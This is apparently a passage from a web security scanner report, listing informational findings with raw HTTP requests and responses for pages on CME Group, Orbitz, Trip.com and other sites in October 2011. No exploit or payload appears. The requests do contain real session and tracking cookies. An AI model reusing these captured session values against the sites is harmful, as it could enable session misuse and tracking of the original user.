Set-Cookie2: Apache=208.49.199.28.1317601605873055; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<h2>As the world gets wealthier, the demand for food is soaring, while producers struggle to provide more s
...[SNIP]...

27.69. http://www.cmegroup.com/advance/plant-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/plant-2.html

Request

GET /advance/plant-2.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1935
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:45 GMT
Connection: close
Set-Cookie2: Apache=208.49.199.20.1317601605871017; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<p>
Producers need a way to manage this risk. CME Group &#8212; the world&#8217;s largest derivatives marketplace &
...[SNIP]...

27.70. http://www.cmegroup.com/advance/plant.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/plant.html

Request

GET /advance/plant.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 97
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:45 GMT
Connection: close
Set-Cookie2: Apache=208.49.199.20.1317601605821341; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<h1>Harvest better results</h1>
</div>

27.71. http://www.cmegroup.com/advance/trade-1.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/trade-1.html

Request

GET /advance/trade-1.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1865
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601606268519; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<h2>In 2009, global manufacturers exported $8.4 trillion worth of goods...more than 14 percent of the world
...[SNIP]...

27.72. http://www.cmegroup.com/advance/trade-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/trade-2.html

Request

GET /advance/trade-2.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1827
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=208.49.199.20.1317601606270101; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<p>
As companies do more business globally, they face ever-greater currency risk and its consequences. Because an u
...[SNIP]...

27.73. http://www.cmegroup.com/advance/trade.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/trade.html

Request

GET /advance/trade.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 95
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601606081031; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<h1>Trade beyond borders</h1>
</div>

27.74. http://www.cmegroup.com/advance/world-advances.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/world-advances.html

Request

GET /advance/world-advances.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 311
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:45 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601605874372; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div id="world-advances-video">
       <a href="video/CMEGroup_HowTheWorldAdvances.m4v" class="video-link xl">
           <h1 class="visuallyhidden">See ho
...[SNIP]...

27.75. http://www.orbitz.com/App/ViewDHTMLCalendar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewDHTMLCalendar

Request

GET /App/ViewDHTMLCalendar?z=7473&r=o HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
ntCoent-Length: 960
Date: Mon, 03 Oct 2011 00:06:52 GMT
Content-Length: 960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">

...[SNIP]...

27.76. http://www.orbitz.com/cacheable/ad.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /cacheable/ad.html

Request

GET /cacheable/ad.html HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; adRotator=true; JSESSIONID=DFE4F06BE571072B; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|egapp2189p.prod.orbitz.net; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA1NTEzNDh8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOTowOToxMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b25545525d5f4f58455e445a4a4217b9; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; mbox=session#1317600406536-142286#1317602423|check#true#1317600623|PC#1317600406536-142286.19#1320192592

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:38 GMT
ETag: "30a-4adda022fb780"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:45:34 GMT
Content-Type: text/html
Cteonnt-Length: 778
Server: Apache
Date: Mon, 03 Oct 2011 00:10:53 GMT
Age: 1519
Connection: keep-alive
Content-Length: 778

<html>
   <head></head>
   <body onLoad="window.adLoaded=true;" onUnload="window.adLoaded=false;" style="background-color:transparent">
       <script type="text/javascript">
           function waitForAdURL(timeout)
...[SNIP]...

27.77. http://www.orbitz.com/cacheable/ad_empty.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /cacheable/ad_empty.html

Request

GET /cacheable/ad_empty.html HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; adRotator=true; JSESSIONID=DFE4F06BE571072B; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|egapp2189p.prod.orbitz.net; curr=USD; myTests=UBP323_SinglePage%3A%7C%3A%7CMERCH500_LeadPriceHiding%3A%7CHOTEL200_SR_Navigation%3A%7C%3A%7CHotelRecommendationAlgorithm%3A%7CUBP_Telesales_Optimization%3A%7C%3A%7C%3A%7CHOTEL210_Dateless_Recommendations%3A%7Cv1; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA1NTEzNDh8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOTowOToxMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b25545525d5f4f58455e445a4a4217b9; mbox=session#1317600406536-142286#1317602423|check#true#1317600623

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:38 GMT
ETag: "2e-4adda022fb780"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:45:34 GMT
Content-Type: text/html
ntCoent-Length: 46
Server: Apache
Date: Mon, 03 Oct 2011 00:09:26 GMT
Age: 1432
Connection: keep-alive
Content-Length: 46

<html><head></head><body>&nbsp;</body></html>

27.78. http://www.orbitz.com/cacheable/cedexis/radar.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /cacheable/cedexis/radar.html

Request

GET /cacheable/cedexis/radar.html HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; JSESSIONID=DFE4F06BE571072B; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|egapp2189p.prod.orbitz.net; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA1NTEzNDh8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOTowOToxMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b25545525d5f4f58455e445a4a4217b9; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; mbox=session#1317600406536-142286#1317602423|check#true#1317600623|PC#1317600406536-142286.19#1320192592; curr=USD; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317597038767:ss=1317596806325; _br_uid_1=uid%3D999836241826%3A; _br_uid_2=uid%3D999836241826%3A%3A

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:38 GMT
ETag: "292-4adda022fb780"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:46:16 GMT
Content-Type: text/html
Cteonnt-Length: 658
Server: Apache
Date: Mon, 03 Oct 2011 00:11:48 GMT
Age: 1533
Connection: keep-alive
Content-Length: 658

<html>
   <head>
       <script type="text/javascript">
           var radarSettings = {
               zoneId: '1',
               customerId: '10325'
           };
           (function(d, w) {
               var onWindowLoaded = function() {
                   var a = docum
...[SNIP]...

27.79. http://www.orbitz.com/cacheable/empty.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /cacheable/empty.html

Request

GET /cacheable/empty.html HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; adRotator=true; JSESSIONID=DFE4F06BE571072B; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|egapp2189p.prod.orbitz.net; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA1NTEzNDh8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOTowOToxMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b25545525d5f4f58455e445a4a4217b9; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; mbox=session#1317600406536-142286#1317602423|check#true#1317600623|PC#1317600406536-142286.19#1320192592

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:38 GMT
ETag: "8-4adda022fb780"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:46:12 GMT
Content-Type: text/html
Cteonnt-Length: 8
Server: Apache
Date: Mon, 03 Oct 2011 00:10:13 GMT
Age: 1441
Connection: keep-alive
Content-Length: 8

<!-- -->

27.80. http://www.orbitz.com/shared/adserverProxy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Request

GET /shared/adserverProxy.jsp?tab=1 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 909
Date: Mon, 03 Oct 2011 00:07:23 GMT
Cache-Control: private
Content-Length: 909

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=273149&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14861,22067,24028,273
...[SNIP]...

27.81. http://www.trip.com/box_ad_refresh.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trip.com
Path:   /box_ad_refresh.html

Request

GET /box_ad_refresh.html?type= HTTP/1.1
Host: www.trip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e3442f45525d5f4f58455e445a4a423660; NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660; __utma=245868737.2049523975.1317602099.1317602099.1317602099.1; __utmb=245868737.2.10.1317602099; __utmc=245868737; __utmz=245868737.1317602099.1.1.utmcsr=orbitz|utmccn=triplooking|utmcmd=crpopunder|utmcct=air; mbox=check#true#1317602160|session#1317602099178-690078#1317603960|PC#1317602099178-690078.19#1318811702; __qca=P0-1307346892-1317602104437; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D1%3B%20s_sq%3Dobtzawytrip.comprod%253D%252526pid%25253DFlights%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bjavascript%2525253AshowRndTripProviders%25252528%25252527flights%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:35:10 GMT
Server: Apache/2.2.18 (Unix) DAV/2 mod_jk/1.2.23
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "c42-4ad908dfe6d00"
Accept-Ranges: bytes
Cteonnt-Length: 3138
Content-Type: text/html
Cache-Control: private
Content-Length: 3138

<HTML>
<HEAD>
<script language="JavaScript" src="http://media.away.com/trip/tripjs/dcl/comparerates-min.js" type="text/javascript"></script>
<style>
h6.adlabel {text-align:center;color:#7E7E7E;fon
...[SNIP]...

27.82. http://www9.effectivemeasure.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hl=1; vt=6c50a866261632f39839b9e202024e62e18088e413-981323754e88f9bc

Response

HTTP/1.1 404 Not Found
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 345
Date: Mon, 03 Oct 2011 00:53:52 GMT
Server: C15

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

27.83. http://xml.premierleague.com/crossDomain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xml.premierleague.com
Path:   /crossDomain.html

Request

GET /crossDomain.html HTTP/1.1
Host: xml.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
